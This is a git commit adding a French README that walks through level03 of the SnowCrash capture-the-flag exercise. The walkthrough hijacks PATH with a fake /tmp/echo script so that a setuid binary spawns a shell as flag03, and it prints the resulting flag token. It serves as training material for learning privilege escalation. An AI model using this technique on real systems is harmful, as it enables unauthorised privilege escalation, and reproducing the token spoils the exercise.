feat(lvl03): adding the readme of level03
This commit is contained in:
Raphael
parent
0c8be67aba
commit
ab753dc9a5
1 changed files with 49 additions and 0 deletions
49
level03/README.md
Normal file
49
level03/README.md
Normal file
|
|
@ -0,0 +1,49 @@
|
||||||
|
Le flag 03 est enfin reelement de l'exploitation de binaire
|
||||||
|
|
||||||
|
Premiere chose que je lance un strings sur le binaire afin de voir si qui en ressort et vers ou chercher
|
||||||
|
```bash
|
||||||
|
/lib/ld-linux.so.2
|
||||||
|
KT{K
|
||||||
|
__gmon_start__
|
||||||
|
libc.so.6
|
||||||
|
_IO_stdin_used
|
||||||
|
setresgid
|
||||||
|
setresuid
|
||||||
|
system
|
||||||
|
getegid
|
||||||
|
geteuid
|
||||||
|
__libc_start_main
|
||||||
|
GLIBC_2.0
|
||||||
|
PTRh
|
||||||
|
UWVS
|
||||||
|
[^_]
|
||||||
|
/usr/bin/env echo Exploit me
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
Je vois que `/usr/bin/env echo` est appeler (env ce base sur le l'environnement de mon user actuel)
|
||||||
|
|
||||||
|
Je tente de faire un fichier dans mon home, mais ca ne met pas permis
|
||||||
|
|
||||||
|
Je tente donc dans le /tmp
|
||||||
|
|
||||||
|
ce qui fonctionne et decide donc d'ouvrir un shell
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cat /tmp/echo
|
||||||
|
bash
|
||||||
|
|
||||||
|
|
||||||
|
export PATH="/tmp:$PATH"
|
||||||
|
|
||||||
|
chmod 777 /tmp/echo
|
||||||
|
|
||||||
|
./level03
|
||||||
|
```
|
||||||
|
|
||||||
|
Je me retrouve donc directement sur le shell de level03
|
||||||
|
|
||||||
|
```bash
|
||||||
|
flag03@SnowCrash:~$ getflag
|
||||||
|
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
|
||||||
|
```
|
||||||
Loading…
Add table
Add a link
Reference in a new issue